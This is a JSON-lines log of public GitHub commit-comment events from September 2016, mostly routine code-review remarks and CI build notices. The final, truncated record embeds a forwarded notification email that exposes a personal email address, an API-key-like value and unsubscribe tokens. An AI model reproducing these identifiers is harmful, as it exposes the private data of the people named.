{"id":"4569853695","type":"CommitCommentEvent","actor":{"login":"talitz"},"repo":{"name":"delphifirst/xv6"},"payload":{"comment":{"id":19041777,"position":57,"line":319,"path":"vm.c","commit_id":"1bc6c41140af7a2d456f609d0a8926283415bceb","created_at":"2016-09-15T18:26:23Z","updated_at":"2016-09-15T18:26:23Z","body":"wtf"}},"created_at":"2016-09-15T18:26:23Z"}
{"id":"4569857135","type":"CommitCommentEvent","actor":{"login":"talitz"},"repo":{"name":"delphifirst/xv6"},"payload":{"comment":{"id":19041787,"position":55,"line":317,"path":"vm.c","commit_id":"1bc6c41140af7a2d456f609d0a8926283415bceb","created_at":"2016-09-15T18:26:58Z","updated_at":"2016-09-15T18:26:58Z","body":"was this line a mistake? WTF octopus: "}},"created_at":"2016-09-15T18:26:58Z"}
{"id":"4569860579","type":"CommitCommentEvent","actor":{"login":"Bunny67"},"repo":{"name":"ElvUI-WotLK/ElvUI"},"payload":{"comment":{"id":19041798,"position":null,"line":null,"path":null,"commit_id":"4233ef72d2eb1d0b5ffddd83380e81dace3bf7b7","created_at":"2016-09-15T18:27:35Z","updated_at":"2016-09-15T18:27:35Z","body":"I do not know how to show the server time in such a way"}},"created_at":"2016-09-15T18:27:35Z"}
{"id":"4569860978","type":"CommitCommentEvent","actor":{"login":"SaatvikShukla"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041801,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:27:39Z","updated_at":"2016-09-15T18:27:39Z","body":"@Martinusbe We sure are, ashwin not so much I guess"}},"created_at":"2016-09-15T18:27:39Z"}
{"id":"4569862539","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19041806,"position":25,"line":111,"path":"objectivec/GPBBootstrap.h","commit_id":"fd36b4d5d23ddd2ced416a98523225ce30e20925","created_at":"2016-09-15T18:27:55Z","updated_at":"2016-09-15T18:27:55Z","body":"generated"}},"created_at":"2016-09-15T18:27:55Z"}
{"id":"4569865465","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19041820,"position":null,"line":null,"path":null,"commit_id":"2d5211b69bf3252d4014779aec7ab7fb79deed0a","created_at":"2016-09-15T18:28:24Z","updated_at":"2016-09-15T18:28:24Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#NpSfaepbQauZVUPlrPda_w"}},"created_at":"2016-09-15T18:28:24Z"}
{"id":"4569875045","type":"CommitCommentEvent","actor":{"login":"guxtav"},"repo":{"name":"guxtav/Just-Java-App"},"payload":{"comment":{"id":19041850,"position":null,"line":null,"path":null,"commit_id":"435aa09bb00883c584aa423aab4ea531132cb9c4","created_at":"2016-09-15T18:30:04Z","updated_at":"2016-09-15T18:30:04Z","body":"This is just for me to remember how to style comments\r\n\r\ntype: subject\r\n\r\nbody\r\n\r\nfooter"}},"created_at":"2016-09-15T18:30:04Z"}
{"id":"4569875915","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19041854,"position":null,"line":null,"path":null,"commit_id":"48e64e1270d9392c9c55cda254e5b69b517463d1","created_at":"2016-09-15T18:30:15Z","updated_at":"2016-09-15T18:30:15Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [source/_partials/footer_scripts.html](https://github.com/pantheon-systems/documentation/commit/48e64e1270d9392c9c55cda254e5b69b517463d1/source/_partials/footer_scripts.html)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/48e64e1270d9392c9c55cda254e5b69b517463d1/source/docs/assets/js/main.js)\n"}},"created_at":"2016-09-15T18:30:15Z"}
{"id":"4569878749","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19041859,"position":57,"line":57,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/view/ScheduleViewMB.java","commit_id":"3ef37c62e4efaff7b065fce43cdc40a08e29b90e","created_at":"2016-09-15T18:30:43Z","updated_at":"2016-09-15T18:30:43Z","body":"I see you just copied the PrimeFaces example over.\r\nThink before you copy anything.\r\nWe won't need any of these methods below this point."}},"created_at":"2016-09-15T18:30:43Z"}
{"id":"4569881418","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19041864,"position":39,"line":39,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/view/ScheduleViewMB.java","commit_id":"3ef37c62e4efaff7b065fce43cdc40a08e29b90e","created_at":"2016-09-15T18:31:12Z","updated_at":"2016-09-15T18:31:12Z","body":"Remove everything from the init method below the first line."}},"created_at":"2016-09-15T18:31:12Z"}
{"id":"4569883072","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19041867,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T18:31:28Z","updated_at":"2016-09-15T18:31:28Z","body":"Damn, why?\r\nOf course an upgrade will work, like for any other package too.\r\nI've done it multiple times, back (2.7.12 -> 2.7.11) and forth (2.7.11 -> 2.7.12).\r\n"}},"created_at":"2016-09-15T18:31:28Z"}
{"id":"4569883162","type":"CommitCommentEvent","actor":{"login":"alexellis"},"repo":{"name":"docker/docker"},"payload":{"comment":{"id":19041868,"position":34,"line":34,"path":"client/node_list.go","commit_id":"7c36a1af031b510cd990cf488ee5998a3efb450f","created_at":"2016-09-15T18:31:29Z","updated_at":"2016-09-15T18:31:29Z","body":"Hi @crosbymichael I was trying this example and got two errors: \r\n\r\n```\r\n# command-line-arguments\r\n./main.go:14: undefined: Client\r\n./main.go:34: undefined: ensureReaderClosed\r\n```\r\n\r\nIs it meant to be a complete example or a template? Where is ` ensureReaderClosed` defined? Thanks"}},"created_at":"2016-09-15T18:31:29Z"}
{"id":"4569883759","type":"CommitCommentEvent","actor":{"login":"benbancroft"},"repo":{"name":"Spiruel/WeasleyClock"},"payload":{"comment":{"id":19041872,"position":5,"line":37,"path":"phone_application/src/uk/co/benbancroft/weasleyclock/LocationService.java","commit_id":"ae577b5a7947bc81afa526d4a43c2088cb8c5b5d","created_at":"2016-09-15T18:31:36Z","updated_at":"2016-09-15T18:31:36Z","body":"derp"}},"created_at":"2016-09-15T18:31:36Z"}
{"id":"4569890619","type":"CommitCommentEvent","actor":{"login":"martenson"},"repo":{"name":"jmchilton/galaxy"},"payload":{"comment":{"id":19041887,"position":22,"line":294,"path":"scripts/config_manage.py","commit_id":"a4b9878c0fb43cb8cded44c8bb76fa8300f9fb99","created_at":"2016-09-15T18:32:48Z","updated_at":"2016-09-15T18:32:48Z","body":"s/pykawlify/pykwalify"}},"created_at":"2016-09-15T18:32:48Z"}
{"id":"4569902735","type":"CommitCommentEvent","actor":{"login":"jacklam718"},"repo":{"name":"jacklam718/react-native-popup-dialog"},"payload":{"comment":{"id":19041971,"position":null,"line":null,"path":null,"commit_id":"284417ae70d1eab8b0c0fdb9e18ea8601035d741","created_at":"2016-09-15T18:34:48Z","updated_at":"2016-09-15T18:34:48Z","body":"I think they can add their own padding, that seems not a big problem.\r\nFor example:\r\n```javascript\r\n<PopupDialog\r\n  ref={(popupDialog) => {\r\n    this.popupDialog = popupDialog;\r\n  }}\r\n  title=\"Popup Dialog\"\r\n>\r\n  <View style={{ padding: 10 }}>\r\n    <Text>Hello</Text>\r\n  </View>\r\n</PopupDialog>\r\n```"}},"created_at":"2016-09-15T18:34:48Z"}
{"id":"4569912748","type":"CommitCommentEvent","actor":{"login":"beanstown106"},"repo":{"name":"PureNexusProject/android_build"},"payload":{"comment":{"id":19042001,"position":null,"line":null,"path":null,"commit_id":"01bf440ae9cbf253d3a35137bb561457edc66d08","created_at":"2016-09-15T18:36:35Z","updated_at":"2016-09-15T18:36:35Z","body":"ya i hadn't noticed it, as i havent had much time to tinker as family has been here on and off for the last month. but davey and nathan sent me your fix, and then i noticed you had reverted as well so figured just revert it all in one commit lol :) "}},"created_at":"2016-09-15T18:36:35Z"}
{"id":"4569914400","type":"CommitCommentEvent","actor":{"login":"kashike"},"repo":{"name":"DemonWav/MinecraftDevIntelliJ"},"payload":{"comment":{"id":19042006,"position":10,"line":10,"path":"src/main/java/com/demonwav/mcdev/update/Channels.java","commit_id":"d9efde22047f66bf5df940c12a2a8d5ab6f62939","created_at":"2016-09-15T18:36:52Z","updated_at":"2016-09-15T18:36:52Z","body":"https://www.youtube.com/watch?v=PSH0eRKq1lE"}},"created_at":"2016-09-15T18:36:52Z"}
{"id":"4569917826","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19042014,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T18:37:28Z","updated_at":"2016-09-15T18:37:28Z","body":"without test change a mayor ipk is not the best way, then we change mayor ipks we need more test before send changes to the user"}},"created_at":"2016-09-15T18:37:28Z"}
{"id":"4569922125","type":"CommitCommentEvent","actor":{"login":"gallingerj"},"repo":{"name":"stephwright/PNWData"},"payload":{"comment":{"id":19042024,"position":null,"line":null,"path":null,"commit_id":"d208565e0c55b0eaec7f404217aeaa33059b1461","created_at":"2016-09-15T18:38:12Z","updated_at":"2016-09-15T18:38:12Z","body":"Now that I have some restaurants, I'm working on a proper version of this file. Where would you like me to put it -- is 'docs' a good place?"}},"created_at":"2016-09-15T18:38:12Z"}
{"id":"4569925710","type":"CommitCommentEvent","actor":{"login":"hosungsmsft"},"repo":{"name":"Azure/azure-linux-extensions"},"payload":{"comment":{"id":19042037,"position":5,"line":299,"path":"Diagnostic/diagnostic.py","commit_id":"711f069e7258511940506f80d58c8949fbdd63c8","created_at":"2016-09-15T18:38:48Z","updated_at":"2016-09-15T18:38:48Z","body":"/cc: @jasonzio \r\n\r\nThis change seems to be causing a regression on distros where Python 2.6 is installed. On distros with Python 2.7, there's no issue. We'll need to look into this. "}},"created_at":"2016-09-15T18:38:48Z"}
{"id":"4569928593","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19042043,"position":null,"line":null,"path":null,"commit_id":"908f1b75243f5a6f92cf374b6eff2a4bb540e450","created_at":"2016-09-15T18:39:19Z","updated_at":"2016-09-15T18:39:19Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T18:39:19Z"}
{"id":"4569933636","type":"CommitCommentEvent","actor":{"login":"cbezault"},"repo":{"name":"illinois-cs241/illinois-cs241.github.io"},"payload":{"comment":{"id":19042057,"position":null,"line":null,"path":null,"commit_id":"c3a40a8caba9adcf13e420644d1d8ea82815a171","created_at":"2016-09-15T18:40:15Z","updated_at":"2016-09-15T18:40:15Z","body":"I would think we would want the behavior of mini_realloc to mirror whatever the implementation of realloc does. But besides that you could just say something along the lines Ben suggested. "}},"created_at":"2016-09-15T18:40:15Z"}
{"id":"4569934056","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19042059,"position":6,"line":123,"path":"src/etc/inc/system.inc","commit_id":"5497ae4e7809656ac7a06a257ae1bd788bdf8211","created_at":"2016-09-15T18:40:19Z","updated_at":"2016-09-15T18:40:19Z","body":"They should remain default, if you rest them the carp cluster can't recover the way it should do, from the man page:\r\n**net.inet.carp.senderr_demotion_factor**\r\n\r\n> This value is added to net.inet.carp.demotion when carp experiences errors sending its announcements.  \r\n> The default value is 240 (the maximum advskew value).\r\n\r\n\r\n**net.pfsync.carp_demotion_factor**\r\n> Value added to net.inet.carp.demotion while pfsync tries to perform its bulk update.  \r\n> See carp(4) for more information.  Default value is 240.\r\n\r\n\r\nThe user can always reset the values in custom sysctl settings, but the defaults really look sane.. \r\n\r\n\r\n"}},"created_at":"2016-09-15T18:40:19Z"}
{"id":"4569934827","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19042061,"position":30,"line":116,"path":"objectivec/GPBBootstrap.h","commit_id":"fd36b4d5d23ddd2ced416a98523225ce30e20925","created_at":"2016-09-15T18:40:26Z","updated_at":"2016-09-15T18:40:26Z","body":"GOOGLE_PROTOBUF_OBJC_MIN_VERSION_SUPPORTED"}},"created_at":"2016-09-15T18:40:26Z"}
{"id":"4569939146","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19042081,"position":null,"line":null,"path":null,"commit_id":"2680a166e7caf5aa60c4f07be3dace9cb888eaf8","created_at":"2016-09-15T18:41:11Z","updated_at":"2016-09-15T18:41:11Z","body":"OMIT"}},"created_at":"2016-09-15T18:41:11Z"}
{"id":"4569941170","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19042087,"position":null,"line":null,"path":null,"commit_id":"1413b3c63d24cb403022073889826c6d83b80317","created_at":"2016-09-15T18:41:30Z","updated_at":"2016-09-15T18:41:30Z","body":"OMIT"}},"created_at":"2016-09-15T18:41:30Z"}
{"id":"4569942226","type":"CommitCommentEvent","actor":{"login":"derjohng"},"repo":{"name":"facebook/facebook-ios-sdk"},"payload":{"comment":{"id":19042091,"position":null,"line":null,"path":null,"commit_id":"4b4bd9504d70d99d6c6b1ca670f486ac8f494f17","created_at":"2016-09-15T18:41:41Z","updated_at":"2016-09-15T18:41:41Z","body":"Hi, I can not find \"issue\" tab for reporting. So, I write here. Hope this is suitable.\r\n4.15.1 will cause below error while I try to archive binary on **Xcode7.3.1**.\r\n\r\n> error: Invalid bitcodee version (Producer: '800.0.38.0_0' Reader: '703.0.31_0')\r\n\r\nIf I change back to 4.15.0, then no the error and archive done.\r\n\r\n> pod 'FBSDKCoreKit', '=4.15.0'\r\n"}},"created_at":"2016-09-15T18:41:41Z"}
{"id":"4569943978","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19042096,"position":null,"line":null,"path":null,"commit_id":"fe89faaf6b06b3ee5b4de259e8b23b0b2e9fd72b","created_at":"2016-09-15T18:42:01Z","updated_at":"2016-09-15T18:42:01Z","body":"OMIT"}},"created_at":"2016-09-15T18:42:01Z"}
{"id":"4569946502","type":"CommitCommentEvent","actor":{"login":"JBBgameich"},"repo":{"name":"minetest-games/Minetest_TNG"},"payload":{"comment":{"id":19042106,"position":29,"line":29,"path":"mods/default/lua/nodes/bamboo.lua","commit_id":"4448321131ed046e0a8e973f6e5dca12c7f4bc35","created_at":"2016-09-15T18:42:28Z","updated_at":"2016-09-15T18:42:28Z","body":"tree = 1 ist bisher nur für den leafdecay"}},"created_at":"2016-09-15T18:42:28Z"}
{"id":"4569947011","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19042110,"position":31,"line":117,"path":"objectivec/GPBBootstrap.h","commit_id":"fd36b4d5d23ddd2ced416a98523225ce30e20925","created_at":"2016-09-15T18:42:33Z","updated_at":"2016-09-15T18:42:33Z","body":"\"this should also change to break code compiled with an old runtime that can't be\""}},"created_at":"2016-09-15T18:42:33Z"}
{"id":"4569947738","type":"CommitCommentEvent","actor":{"login":"lptr"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19042113,"position":43,"line":117,"path":"subprojects/core/src/main/java/org/gradle/api/internal/tasks/execution/SkipCachedTaskExecuter.java","commit_id":"0c3a8747416a7c8b8bf2fef07119bf4487a2e8ec","created_at":"2016-09-15T18:42:40Z","updated_at":"2016-09-15T18:42:40Z","body":"I wonder if the `debug` and `info` messages should also be printed by the listeners?"}},"created_at":"2016-09-15T18:42:40Z"}
{"id":"4569951823","type":"CommitCommentEvent","actor":{"login":"aaronrenner"},"repo":{"name":"knewter/shared_counters"},"payload":{"comment":{"id":19042125,"position":null,"line":null,"path":null,"commit_id":"c0c25281f86f2e96f3194d2aa908ea26905adfd9","created_at":"2016-09-15T18:43:24Z","updated_at":"2016-09-15T18:43:24Z","body":"I like the commit message. 😄 "}},"created_at":"2016-09-15T18:43:24Z"}
{"id":"4569951960","type":"CommitCommentEvent","actor":{"login":"lptr"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19042126,"position":46,"line":46,"path":"subprojects/core/src/main/java/org/gradle/internal/buildevents/CacheStatisticsReporter.java","commit_id":"0c3a8747416a7c8b8bf2fef07119bf4487a2e8ec","created_at":"2016-09-15T18:43:26Z","updated_at":"2016-09-15T18:43:26Z","body":"FTR, we discussed that this should use `StyledTextOutput` instead of `System.out`."}},"created_at":"2016-09-15T18:43:26Z"}
{"id":"4569953638","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19042131,"position":null,"line":null,"path":null,"commit_id":"256361d7d8b25d915e466a0ab8b7a4a60acfeaa6","created_at":"2016-09-15T18:43:43Z","updated_at":"2016-09-15T18:43:43Z","body":"OMIT"}},"created_at":"2016-09-15T18:43:43Z"}
{"id":"4569955843","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19042137,"position":24,"line":81,"path":"objectivec/GPBUtilities.m","commit_id":"fd36b4d5d23ddd2ced416a98523225ce30e20925","created_at":"2016-09-15T18:44:07Z","updated_at":"2016-09-15T18:44:07Z","body":". 30001 is the last version using this old versioning model. When that support is removed, this function can be removed (along with the declaration in GPBUtilities_PackagePrivate.h)."}},"created_at":"2016-09-15T18:44:07Z"}
{"id":"4569960745","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19042153,"position":6,"line":123,"path":"src/etc/inc/system.inc","commit_id":"5497ae4e7809656ac7a06a257ae1bd788bdf8211","created_at":"2016-09-15T18:44:56Z","updated_at":"2016-09-15T18:44:56Z","body":"Ok, fine with me. I will try to ask the reporter for feedback on the new devel code that will be out with 16.7.4"}},"created_at":"2016-09-15T18:44:56Z"}
{"id":"4569961548","type":"CommitCommentEvent","actor":{"login":"pgrimsehl"},"repo":{"name":"npruehs/tome-editor"},"payload":{"comment":{"id":19042154,"position":null,"line":null,"path":null,"commit_id":"11833c65dbb4100eecbfeb7bf2b4a21cb749f0d3","created_at":"2016-09-15T18:45:05Z","updated_at":"2016-09-15T18:45:05Z","body":"Nice implementation of the feature :)"}},"created_at":"2016-09-15T18:45:05Z"}
{"id":"4569962024","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19042158,"position":null,"line":null,"path":null,"commit_id":"908f1b75243f5a6f92cf374b6eff2a4bb540e450","created_at":"2016-09-15T18:45:12Z","updated_at":"2016-09-15T18:45:12Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1761 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T18:45:12Z"}
{"id":"4569962088","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19042159,"position":26,"line":112,"path":"objectivec/GPBBootstrap.h","commit_id":"fd36b4d5d23ddd2ced416a98523225ce30e20925","created_at":"2016-09-15T18:45:13Z","updated_at":"2016-09-15T18:45:13Z","body":"perhaps rename to GOOGLE_PROTOBUF_OBJC_MIN_SUPPORTED_VERSION "}},"created_at":"2016-09-15T18:45:13Z"}
{"id":"4569965535","type":"CommitCommentEvent","actor":{"login":"olamothe"},"repo":{"name":"coveo/search-ui"},"payload":{"comment":{"id":19042169,"position":13,"line":105,"path":"src/ui/Recommendation/Recommendation.ts","commit_id":"d97f964ba5c028fddb2b98bdc37c7f2c25e9de53","created_at":"2016-09-15T18:45:46Z","updated_at":"2016-09-15T18:45:46Z","body":"Indeed ! \r\n\r\nFixing asap."}},"created_at":"2016-09-15T18:45:46Z"}
{"id":"4569967586","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19042177,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T18:46:09Z","updated_at":"2016-09-15T18:46:09Z","body":"for playing with new version use next branch and not the branch we use for nightly images"}},"created_at":"2016-09-15T18:46:09Z"}
{"id":"4569971239","type":"CommitCommentEvent","actor":{"login":"Ridaz"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19042187,"position":null,"line":null,"path":null,"commit_id":"7931bde4b70b9f9e07e9a3b2c3c4e432d9258abb","created_at":"2016-09-15T18:46:44Z","updated_at":"2016-09-15T18:46:44Z","body":"And fix a certain misplaced 0.\r\n\r\nHex: \r\n![hex](https://cloud.githubusercontent.com/assets/7467006/18562212/adcb33f2-7b7a-11e6-9a2c-a3aa3d8659f8.gif)\r\n"}},"created_at":"2016-09-15T18:46:44Z"}
{"id":"4569971740","type":"CommitCommentEvent","actor":{"login":"acorncom"},"repo":{"name":"samselikoff/ember-cli-mirage"},"payload":{"comment":{"id":19042190,"position":null,"line":null,"path":null,"commit_id":"ef5744a0db17dba87831c1ac9cfd0f4695cca865","created_at":"2016-09-15T18:46:50Z","updated_at":"2016-09-15T18:46:50Z","body":"Yeah, sure is nice to have something extra there now that's built in ;-)\r\n\r\nAnd yeah, more and more tickled with Canvas the more I use it"}},"created_at":"2016-09-15T18:46:50Z"}
{"id":"4569977525","type":"CommitCommentEvent","actor":{"login":"gadgetsgalaxy"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19042204,"position":null,"line":null,"path":null,"commit_id":"db7ad8647dbb51a3c3bcbe15dd98a65081cd53f3","created_at":"2016-09-15T18:47:51Z","updated_at":"2016-09-15T18:47:51Z","body":"[03:20:02 PM]  Scene: ...\r\n[03:20:03 PM]  Scene: Adventure Fight\r\n[03:20:04 PM]  Scene: ...\r\n[03:20:09 PM]  Scene: Victory\r\n[03:20:13 PM]  Scene: Adventure Loot\r\n[03:20:15 PM]  Scene: ...\r\n[03:20:17 PM]  Scene: Level 30 Dialog\r\n[03:20:17 PM]  Hero Level 30\r\n[03:20:17 PM]  Max Heroes level up per day : 313/100\r\n[03:20:17 PM]  Changing objective to: Hero Management\r\n[03:20:18 PM]  Scene: Adventure Start\r\n[03:20:19 PM]  Scene: Heroes\r\n[03:20:19 PM]  Start managing heroes\r\n[03:20:20 PM]  Checking each position for level 30...\r\n[03:20:21 PM]  - Got position: 3\r\n[03:20:26 PM]  Finding heroes...\r\n[03:20:29 PM]  Replaced hero position: 3\r\n[03:20:29 PM]  Done managing heroes\r\n[03:20:29 PM]  Changing objective to: Adventure\r\n \r\nrelease. 160913 \r\nmax heroes level up keep stack doesn't reset. and profile not changing.\r\n\r\nis this fixed ?"}},"created_at":"2016-09-15T18:47:51Z"}
{"id":"4569978773","type":"CommitCommentEvent","actor":{"login":"brentp"},"repo":{"name":"gogetdata/ggd-cli"},"payload":{"comment":{"id":19042207,"position":25,"line":25,"path":"ggd/list_files.py","commit_id":"904550a1efea1d6c3d454e6aa6d472c65bedabf6","created_at":"2016-09-15T18:48:05Z","updated_at":"2016-09-15T18:48:05Z","body":"separate to \"share\", \"ggd\" for it to be cross-platform."}},"created_at":"2016-09-15T18:48:05Z"}
{"id":"4569979627","type":"CommitCommentEvent","actor":{"login":"zhemao"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":19042209,"position":null,"line":null,"path":null,"commit_id":"f363f5f7094436b05e3db26e3fcba8b47648effb","created_at":"2016-09-15T18:48:15Z","updated_at":"2016-09-15T18:48:15Z","body":"You could move it there. Right now, this is the only place it's being used. I guess if you wanted to make a different test harness you would want to use this.\r\n\r\nI'm planning to move some other things into utils later. I'll do it then."}},"created_at":"2016-09-15T18:48:15Z"}
{"id":"4569981313","type":"CommitCommentEvent","actor":{"login":"jypweb"},"repo":{"name":"radiant-player/radiant-player-mac"},"payload":{"comment":{"id":19042212,"position":null,"line":null,"path":null,"commit_id":"347ce3d55e2f62f076f9f4bad9071c6c3b9f0a3e","created_at":"2016-09-15T18:48:31Z","updated_at":"2016-09-15T18:48:31Z","body":"You guys are awesome!  Thanks so much for pushing this fix."}},"created_at":"2016-09-15T18:48:31Z"}
{"id":"4569984629","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19042227,"position":7,"line":253,"path":"src/utils/polygon.h","commit_id":"72e4bf8069f50ab8b4e11552d5eac29424bfda88","created_at":"2016-09-15T18:49:07Z","updated_at":"2016-09-15T18:49:07Z","body":"Maximum is a noun, maximal is an adjective."}},"created_at":"2016-09-15T18:49:07Z"}
{"id":"4569987612","type":"CommitCommentEvent","actor":{"login":"guybanaga123"},"repo":{"name":"jleahy7/CSCI-2999-Capstone_Project"},"payload":{"comment":{"id":19042233,"position":null,"line":null,"path":null,"commit_id":"796319b13290c91169385feb8786f6d3da44831c","created_at":"2016-09-15T18:49:37Z","updated_at":"2016-09-15T18:49:37Z","body":"Thanks Jimmy!\n\n\nSent from my SAMSUNG GALAXY S 7 Edge Plus\n-------- Original message --------From: jimmycrackc0rn7 <notifications@github.com> Date: 9/15/16  1:55 PM  (GMT-05:00) To: jleahy7/CSCI-2999-Capstone_Project <CSCI-2999-Capstone_Project@noreply.github.com> Cc: guybanaga123 <guybanaga123@yahoo.com>, Comment <comment@noreply.github.com> Subject: Re: [jleahy7/CSCI-2999-Capstone_Project] Add files via upload\n  (796319b) \nIt is located here\n\nhttps://github.com/jleahy7/CSCI-2999-Capstone_Project/blob/master/week3/thursday/Ever%20Health%20Final%20Plan.pptx\n\n\n\nClick 'View Raw\" to download the file and view it.\n\n\n\nOn Thu, Sep 15, 2016 at 1:45 PM, guybanaga123 <notifications@github.com>\n\nwrote:\n\n\n\n> Reviewed all files but still can`t find the most up to dated version of\n\n> the PP presentation...\n\n>\n\n> —\n\n> You are receiving this because you are subscribed to this thread.\n\n> Reply to this email directly, view it on GitHub\n\n> <https://github.com/jleahy7/CSCI-2999-Capstone_Project/commit/796319b13290c91169385feb8786f6d3da44831c#commitcomment-19040972>,\n\n> or mute the thread\n\n> <https://github.com/notifications/unsubscribe-auth/AK0drpPh9iXAaxWHDNgeNtLsfBESV753ks5qqYQwgaJpZM4J-JOF>\n\n> .\n\n>\n\n\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n  \n  \n\n\n\n\n{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/jleahy7/CSCI-2999-Capstone_Project\",\"title\":\"jleahy7/CSCI-2999-Capstone_Project\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://cloud.githubusercontent.com/assets/143418/17495839/a5054eac-5d88-11e6-95fc-7290892c7bb5.png\",\"avatar_image_url\":\"https://cloud.githubusercontent.com/assets/143418/15842166/7c72db34-2c0b-11e6-9aed-b52498112777.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/jleahy7/CSCI-2999-Capstone_Project\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@jimmycrackc0rn7 on 796319b: It is located here\\nhttps://github.com/jleahy7/CSCI-2999-Capstone_Project/blob/master/week3/thursday/Ever%20Health%20Final%20Plan.pptx\\n\\nClick 'View Raw\\\" to download the file and view it.\\n\\nOn Thu, Sep 15, 2016 at 1:45 PM, guybanaga123 \\u003cnotifications@github.com\\u003e\\nwrote:\\n\\n\\u003e Reviewed all files but still can`t find the most up to dated version of\\n\\u003e the PP presentation...\\n\\u003e\\n\\u003e —\\n\\u003e You are receiving this because you are subscribed to this thread.\\n\\u003e Reply to this email directly, view it on GitHub\\n\\u003e \\u003chttps://github.com/jleahy7/CSCI-2999-Capstone_Project/commit/796319b13290c91169385feb8786f6d3da44831c#commitcomment-19040972\\u003e,\\n\\u003e or mute the thread\\n\\u003e \\u003chttps://github.com/notifications/unsubscribe-auth/AK0drpPh9iXAaxWHDNgeNtLsfBESV753ks5qqYQwgaJpZM4J-JOF\\u003e\\n\\u003e 